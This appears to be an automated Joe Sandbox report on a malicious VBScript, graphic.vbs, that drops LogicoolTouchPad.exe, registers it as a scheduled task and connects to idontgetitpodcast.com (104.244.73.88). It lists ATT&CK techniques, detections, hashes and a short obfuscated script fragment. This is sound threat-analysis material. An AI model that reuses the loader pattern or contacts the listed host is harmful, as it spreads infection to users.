            Exploitation for Client Execution
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory1
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            Exfiltration Over Bluetooth1
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
            Process Injection
            Security Account Manager1
            Remote System Discovery
            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
            Non-Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            Deobfuscate/Decode Files or Information
            NTDS2
            System Information Discovery
            Distributed Component Object ModelInput CaptureScheduled Transfer3
            Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script121
            Scripting
            LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common3
            Obfuscated Files or Information
            Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Software Packing
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            No Antivirus matches
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLinkDownload
            1.0.LogicoolTouchPad.exe.24f0174.3.unpack100%AviraTR/Kazy.4159236Download File
            27.2.LogicoolTouchPad.exe.2420174.2.unpack100%AviraTR/Kazy.4159236Download File
            1.2.LogicoolTouchPad.exe.24a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.0.LogicoolTouchPad.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.0.LogicoolTouchPad.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            27.0.LogicoolTouchPad.exe.23e0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            27.0.LogicoolTouchPad.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            27.0.LogicoolTouchPad.exe.400000.0.unpack100%AviraHEUR/AGEN.1232832Download File
            1.2.LogicoolTouchPad.exe.24f0174.2.unpack100%AviraTR/Kazy.4159236Download File
            27.0.LogicoolTouchPad.exe.23e0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            27.0.LogicoolTouchPad.exe.2420174.6.unpack100%AviraTR/Kazy.4159236Download File
            27.2.LogicoolTouchPad.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.0.LogicoolTouchPad.exe.24a0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.0.LogicoolTouchPad.exe.24a0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            27.0.LogicoolTouchPad.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            27.2.LogicoolTouchPad.exe.23e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            27.0.LogicoolTouchPad.exe.2420174.3.unpack100%AviraTR/Kazy.4159236Download File
            1.2.LogicoolTouchPad.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.0.LogicoolTouchPad.exe.24f0174.6.unpack100%AviraTR/Kazy.4159236Download File
            SourceDetectionScannerLabelLink
            idontgetitpodcast.com1%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://www.borland.com/namespaces/Types-0%Avira URL Cloudsafe
            https://idontgetitpodcast.com/0%Avira URL Cloudsafe
            http://www.borland.com/namespaces/Types0%URL Reputationsafe
            http://www.borland.com/namespaces/Typesh0%Avira URL Cloudsafe
            https://idontgetitpodcast.com/contacting/responsible.dae0%Avira URL Cloudsafe
            https://idontgetitpodcast.com/contacting/responsible.daem0%Avira URL Cloudsafe
            http://www.borland.com/namespaces/TypesR0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            idontgetitpodcast.com
            104.244.73.88
            truetrueunknown
            NameMaliciousAntivirus DetectionReputation
            https://idontgetitpodcast.com/contacting/responsible.daetrue
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://www.borland.com/namespaces/Types-LogicoolTouchPad.exe, 00000001.00000002.330199560.000000000080A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://idontgetitpodcast.com/wscript.exe, 00000000.00000003.270651210.000001D4A83A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.269529203.000001D4A83A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.283174620.000001D4A83A3000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            http://www.borland.com/namespaces/TypesLogicoolTouchPad.exefalse
            • URL Reputation: safe
            unknown
            http://www.borland.com/namespaces/TypeshLogicoolTouchPad.exe, 00000001.00000002.330199560.000000000080A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Typeswscript.exe, 00000000.00000003.271192944.000001D4A9072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.270558268.000001D4A9072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.268142727.000001D4A8EFB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.271051829.000001D4A9072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.268881837.000001D4A8DF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.270101303.000001D4A9430000.00000004.00000020.00020000.00000000.sdmp, LogicoolTouchPad.exe, 00000001.00000000.282320853.000000000040C000.00000020.00000001.01000000.00000005.sdmp, LogicoolTouchPad.exe, 00000001.00000000.270511918.0000000000401000.00000020.00000001.01000000.00000005.sdmp, LogicoolTouchPad.exe, 0000001B.00000002.524272566.000000000040C000.00000020.00000001.01000000.00000005.sdmp, LogicoolTouchPad.exe, 0000001B.00000000.493624685.0000000000401000.00000020.00000001.01000000.00000005.sdmp, LogicoolTouchPad.exe.0.drfalse
              high
              https://idontgetitpodcast.com/contacting/responsible.daemwscript.exe, 00000000.00000003.281065138.000001D4A8BFC000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/soap/encoding/LogicoolTouchPad.exefalse
                high
                http://www.borland.com/namespaces/TypesRLogicoolTouchPad.exe, 00000001.00000002.330199560.000000000080A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                104.244.73.88
                idontgetitpodcast.comUnited States
                53667PONYNETUStrue
                Joe Sandbox Version:35.0.0 Citrine
                Analysis ID:651434
                Start date and time: 23/06/202223:13:102022-06-23 23:13:10 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 12m 3s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:graphic.vbs
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:32
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal76.troj.evad.winVBS@5/7@1/1
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 3% (good quality ratio 1.2%)
                • Quality average: 26.8%
                • Quality standard deviation: 35.8%
                HCA Information:
                • Successful, ratio: 84%
                • Number of executed functions: 26
                • Number of non-executed functions: 17
                Cookbook Comments:
                • Found application associated with file extension: .vbs
                • Adjust boot time
                • Enable AMSI
                • Override analysis time to 240s for JS/VBS files not yet terminated
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                • Not all processes where analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                TimeTypeDescription
                23:14:51Task SchedulerRun new task: LogicoolTouchPad path: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exe
                23:14:51API Interceptor2x Sleep call for process: wscript.exe modified
                No context
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                PONYNETUS1qIjASCRGYAaLEz.dll.dllGet hashmaliciousBrowse
                • 104.244.79.94
                WOXM0YpQWOXVc.dll.dllGet hashmaliciousBrowse
                • 104.244.79.94
                RySDKk2i5dGGJv.dll.dllGet hashmaliciousBrowse
                • 104.244.79.94
                1qIjASCRGYAaLEz.dll.dllGet hashmaliciousBrowse
                • 104.244.79.94
                77547.xls.xlsGet hashmaliciousBrowse
                • 104.244.79.94
                tztvZOv4Y7H9XtIC.dll.dllGet hashmaliciousBrowse
                • 104.244.79.94
                kbmFth1f.dll.dllGet hashmaliciousBrowse
                • 104.244.79.94
                FMPWWMnxA5sVtV8w.dll.dllGet hashmaliciousBrowse
                • 104.244.79.94
                nlZGxxRTLhIF.dll.dllGet hashmaliciousBrowse
                • 104.244.79.94
                ygFsj64wfP30jJ7.dll.dllGet hashmaliciousBrowse
                • 104.244.79.94
                Gq4tRD938tII.dll.dllGet hashmaliciousBrowse
                • 104.244.79.94
                e7mhiPg8uQP3KhlwV.dll.dllGet hashmaliciousBrowse
                • 104.244.79.94
                Gq4tRD938tII.dll.dllGet hashmaliciousBrowse
                • 104.244.79.94
                xd.armGet hashmaliciousBrowse
                • 209.141.37.15
                List-22062022.xlsGet hashmaliciousBrowse
                • 104.244.79.94
                zzb 2306.xlsGet hashmaliciousBrowse
                • 104.244.79.94
                i686Get hashmaliciousBrowse
                • 107.189.8.21
                i586Get hashmaliciousBrowse
                • 107.189.8.21
                mipselGet hashmaliciousBrowse
                • 107.189.8.21
                RhYFmRS3w6.dllGet hashmaliciousBrowse
                • 104.244.79.94
                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                ce5f3254611a8c095a3d821d44539877Shrjdjykdhjt.dllGet hashmaliciousBrowse
                • 104.244.73.88
                Shrjdjykdhjt.dllGet hashmaliciousBrowse
                • 104.244.73.88
                facereomnis.lnkGet hashmaliciousBrowse
                • 104.244.73.88
                nisimolestiae.lnkGet hashmaliciousBrowse
                • 104.244.73.88
                eoslibero.lnkGet hashmaliciousBrowse
                • 104.244.73.88
                quideleniti.lnkGet hashmaliciousBrowse
                • 104.244.73.88
                RFQ 10050395.exeGet hashmaliciousBrowse
                • 104.244.73.88
                ETBOdBrV1t.exeGet hashmaliciousBrowse
                • 104.244.73.88
                rfAV6Ve3rP.lnkGet hashmaliciousBrowse
                • 104.244.73.88
                VDXJRDz0Pm.lnkGet hashmaliciousBrowse
                • 104.244.73.88
                praesentiumsit.lnkGet hashmaliciousBrowse
                • 104.244.73.88
                BlueCode_HashFinder_9.3.exeGet hashmaliciousBrowse
                • 104.244.73.88
                reiciendisperferendis.lnkGet hashmaliciousBrowse
                • 104.244.73.88
                etnon.lnkGet hashmaliciousBrowse
                • 104.244.73.88
                ORDER NO-08374345345.pdf.exeGet hashmaliciousBrowse
                • 104.244.73.88
                WTIwNMJTrA.exeGet hashmaliciousBrowse
                • 104.244.73.88
                WTIwNMJTrA.exeGet hashmaliciousBrowse
                • 104.244.73.88
                form_33-109f1_notice_of_termination_of_registered_individuals_and_perm (nb).jsGet hashmaliciousBrowse
                • 104.244.73.88
                RFQ_23233.exeGet hashmaliciousBrowse
                • 104.244.73.88
                RQR59GnemD.msiGet hashmaliciousBrowse
                • 104.244.73.88
                No context
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:data
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):0.9549491394338331
                Encrypted:false
                SSDEEP:96:eHQeS/wXNSKf7pXIQcQ/c62HcEicw3qhI+HbHg/8BRTf3jFa9iVfNsOIMbJOyghx:kQeNHhCHoMjNkIBE/u7sbS274Ite
                MD5:6630D6E1E611ED1B98C48218ABE17B17
                SHA1:CB702197EE7976D727A750B06063B51902AA991D
                SHA-256:47D6E90F6255E3087DC09F7CEDBAE9BE5CF1CC75299562BF2CDF2773F51EACF8
                SHA-512:F312485DD94170D62D05A9E39F0358C64D1DE2208A4A34D35C823D912C321C6F273C1B9C668C0C95C1BE9F5037A828E92843E15BECA743733884452916E3BC5E
                Malicious:false
                Reputation:low
                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.0.4.9.2.5.0.4.8.8.5.4.5.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.0.4.9.2.5.0.9.5.7.2.9.6.9.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.9.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.4.e.2.2.8.2.d.-.b.f.0.c.-.4.e.e.f.-.8.8.7.b.-.b.9.7.1.4.7.6.2.4.c.e.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.5.7.b.3.5.c.f.-.2.4.5.e.-.4.7.4.a.-.a.6.5.f.-.9.0.e.a.7.c.4.3.1.a.a.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.o.g.i.c.o.o.l.T.o.u.c.h.P.a.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.7.z...e.x.e.*.....P.r.o.d.u.c.t.N.a.m.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.0.0.-.0.0.0.1.-.0.0.1.c.-.b.a.0.e.-.e.1.4.6.4.6.8.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.b.a.d.2.8.1.9.f.7.f.5.6.5.e.7.b.a.0.9.2.d.0.5.2.8.c.4.8.8.a.6.0.0.0.0.0.9.0.4.!.0.0.0.0.e.8.0.b.9.d.4.6.4.9.d.f.a.2.9.e.e.6.2.7.2.a.0.d.7.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:data
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):0.948749505497814
                Encrypted:false
                SSDEEP:192:C6lKm7hHhCHoMjEhjPn/u7sxS274Itez:bKKxhcoMjW/u7sxX4Ite
                MD5:0793D548E88868CB789B538223F82024
                SHA1:ABE17AA85985C0336F63029C3235B34FA7FFB1FA
                SHA-256:225CAEA450CC6934345D14DE0DF907B22EB41B0009D52E619185958ABFE89FDD
                SHA-512:8DCB7DBE253239403559E380F8DEEF4F55C1D2C332387D3CA99759372A8FEB9617035155B07D1046DCED86BEDE3AC96E20D3CB87B7B7420F0604D3F71D1F1868
                Malicious:false
                Reputation:low
                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.0.4.9.2.6.0.2.3.4.0.8.1.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.0.4.9.2.6.0.9.6.5.3.2.1.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.9.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.c.a.f.f.4.d.f.-.8.6.2.a.-.4.6.a.9.-.b.b.5.4.-.9.4.7.7.b.6.6.5.f.9.8.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.3.2.3.0.0.f.7.-.d.1.d.3.-.4.4.4.8.-.b.9.1.f.-.e.9.c.0.3.7.a.b.5.d.6.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.o.g.i.c.o.o.l.T.o.u.c.h.P.a.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.7.z...e.x.e.*.....P.r.o.d.u.c.t.N.a.m.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.b.c.-.0.0.0.1.-.0.0.1.c.-.0.1.b.b.-.3.b.8.5.4.6.8.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.b.a.d.2.8.1.9.f.7.f.5.6.5.e.7.b.a.0.9.2.d.0.5.2.8.c.4.8.8.a.6.0.0.0.0.0.9.0.4.!.0.0.0.0.e.8.0.b.9.d.4.6.4.9.d.f.a.2.9.e.e.6.2.7.2.a.0.d.7.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Mini DuMP crash report, 14 streams, Thu Jun 23 21:16:44 2022, 0x1205a4 type
                Category:dropped
                Size (bytes):1103732
                Entropy (8bit):1.3892764169544443
                Encrypted:false
                SSDEEP:1536:7V38bfUWzYJIuQkVRaqWVU84QhzetNIWzfOsLThcY6uMNyHEC3C:2bfUMYJIuFWHhatNIYfOsLTXEC3C
                MD5:2B7289CF793E7046CD712F5953B9DA46
                SHA1:E3263226D3B4095D43C27DE3688D8A1F1909CBA7
                SHA-256:FD4169270B815A8C5322DE50BC3ABCFBE8A596D6DBF25C6CAB32DDF9D5013E4F
                SHA-512:E6AF6ECD04F49A7D7EE9268F703B152311BA5A3C8256CAD933AE503708AECAD78F19835846D471FD6E57A906428DF2CD66AEC2C1044C6F059EDF8955B1E57605
                Malicious:false
                Reputation:low
                Preview:MDMP....... .......<.b............T...........(...\...........f8..........T.......8...........T......................................p....................................................................U...........B..............GenuineIntelW...........T...........4.b.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                Category:dropped
                Size (bytes):8332
                Entropy (8bit):3.6981217994993423
                Encrypted:false
                SSDEEP:192:Rrl7r3GLNi4o6IlH6Yg1SU4XgmfGS/J3+pDf89bPtsfiFm:RrlsNiv6IlH6YCSUygmfGSlPmfJ
                MD5:83E8FBA9AF86FFCDB2A2C7D1438C23A5
                SHA1:BF639DCF204DD644C6C32C85BC368E145BE043F0
                SHA-256:30F3003348BE58EC5337B9E3402559F0CC8CAE4A6C712B689670E1161416FC34
                SHA-512:7E4AFC9BFB44E80ED7FDADF1E98E3176C0B99A9A65A0AF4A5D36B37EEA2ADBB8AC80F40B3559D437BC3CC222BA59B23FE9F7F84692600349983BB0FF3BAF35FD
                Malicious:false
                Reputation:low
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.8.8.<./.P.i.d.>.......
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Mini DuMP crash report, 14 streams, Thu Jun 23 21:15:06 2022, 0x1205a4 type
                Category:dropped
                Size (bytes):1104148
                Entropy (8bit):1.3841253492744015
                Encrypted:false
                SSDEEP:1536:5p1V38LfTHzQuNq4kiSeqWl0w4FpzmtNIO7fesLDhcY6gUyKl1Du:sLfTTQuNqaPmpitNIYfesLD6XDu
                MD5:ECDAEB26A19198632D0B6A853B666B2F
                SHA1:20F89F8ED5D388F6552CD67ADDB3FAADE964849B
                SHA-256:D26C2D9E7390CA965B665B6AEFBF945325D7D80AE4D86EF11046F0F676C1A14B
                SHA-512:C5BDF9B27EA4E4CAAE842BBED593EB18F45F5583F0296B53D6676E8B3A76859532FD7422D5E1CCC306C22CA2B9C00B10283F20016482E36E18033F36661E0214
                Malicious:false
                Reputation:low
                Preview:MDMP....... .........b............T...............\............8..........T.......8...........T...............t............................................................................................U...........B......t.......GenuineIntelW...........T.............b.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                Category:dropped
                Size (bytes):8332
                Entropy (8bit):3.696966644180345
                Encrypted:false
                SSDEEP:192:Rrl7r3GLNihO6IlrxE6YgzSU8kgmfGS/J3+pD289bRlsf0i7m:RrlsNiY6IlrS6YUSU9gmfGSqR+f6
                MD5:8276E7B5F552BAF0D659C848EC037668
                SHA1:E76CEAC8DF29038E2AB43543A6522F8DE2993730
                SHA-256:82EC93B347922F764F78C737D01D761C6D6C6899FE125153D3A6329DE8027D0A
                SHA-512:BFD70A209416E3A425D9595B29370F767834B170FFB8262F95EA1B68EA6300611C471646086B561D5B2A64009D6499B12385B56224D6BC6EE31FD6332C7788B7
                Malicious:false
                Reputation:low
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.0.0.<./.P.i.d.>.......
                Process:C:\Windows\System32\wscript.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):1043968
                Entropy (8bit):6.714780980017607
                Encrypted:false
                SSDEEP:12288:PRuwQc5qewWUH5gTSGINfhj+kXIsYXh2kRpATTV6PzXTwn61cQ47gNckpPWUlQVt:Z0eNPAkFwgkwbYBEu4fYY8s
                MD5:216BBB6CE29EF16A61B9D5BA4D227300
                SHA1:E80B9D4649DFA29EE6272A0D77F72482CF1CCA4E
                SHA-256:3A0789AEAA433B8043EF5E58B025F58A76126A6AFBBD82BA6E4FBD0C79E62FD7
                SHA-512:14FAB78027AD33C49AFA14DBFCF6A8691B04BB19422735DB35857EE3384FC543D6766C9E9FEF36DAEF39D271E19266FA64DF9A1449A187DC4198D3CDE46DC043
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Reputation:low
                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................................... ....@..........................`...................@...........................p...!..................................................................................................................CODE....X........................... ..`DATA.....'... ...(..................@...BSS.....E....P.......0...................idata...!...p..."...0..............@....tls.................R...................rdata...............R..............@..P.reloc...............T..............@..P.rsrc................T..............@..P.............`......................@..P........................................................................................................................................
                File type:ASCII text, with very long lines
                Entropy (8bit):5.981282042267296
                TrID:
                  File name:graphic.vbs
                  File size:406244
                  MD5:d2945c4124e2f89c05a723f7c1ad416d
                  SHA1:414faaa0bf15450bc7f84c31024fa8fed26eb156
                  SHA256:ac1cad78a2be2e78a05a51cf4d1b5eac2a6b302a40c3f6157496e00b4dcb81cd
                  SHA512:934774aad58e2a3d4af34d16b5feecc93f5558911b64f84f069381ee10e066728984151776ae4132ab189243f69b848816e49d4480c19974dcd72a56c4391695
                  SSDEEP:6144:CHnJw2yvbGTSqC+2wvjuhRfBPSqweSExQxCUoaa+Y4glR7e5hMgxwDK:ubgKs+2wubf6HxDoaRY5C3xeK
                  TLSH:5384E1B071E456713B9D871A55F05EB3A13E07930B123DB0DAE7071BAF06DD06F68A2A
                  File Content Preview:.On Error Resume Next.dim ZiLOTkT, bbNLRjf, FdlvVq, iuPKDLa, kaAMG.ZiLOTkT = "100%C101XE98S.r{46vk]59f~44]FjZ3YF-g100|?o.F101dli97k pJ?H104*e%45ME&n18Z49+_{K 35<.GO30X100C]u_M101yZ.mU97T.O113B~_}1-26;57<l106P117I100q,.R101a[103_m W!b25YI123)48{meb100r-UVe
                  Icon Hash:e8d69ece869a9ec4
                  TimestampSource PortDest PortSource IPDest IP
                  Jun 23, 2022 23:14:27.999174118 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:27.999241114 CEST44349746104.244.73.88192.168.2.4
